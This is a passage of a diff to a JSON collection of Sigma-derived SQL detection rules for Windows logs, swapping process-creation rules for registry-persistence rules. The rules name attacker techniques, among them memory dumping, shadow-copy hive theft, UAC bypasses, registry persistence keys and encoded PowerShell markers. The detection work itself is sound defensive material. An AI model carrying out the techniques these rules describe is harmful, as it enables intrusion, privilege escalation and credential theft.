CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", - "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. Anhaus, oscd.community", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "status": "experimental", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR NewProcessName LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": "0bbc6369-43e3-453d-9944-cae58821c173", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powertool.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "description": "Bypasses 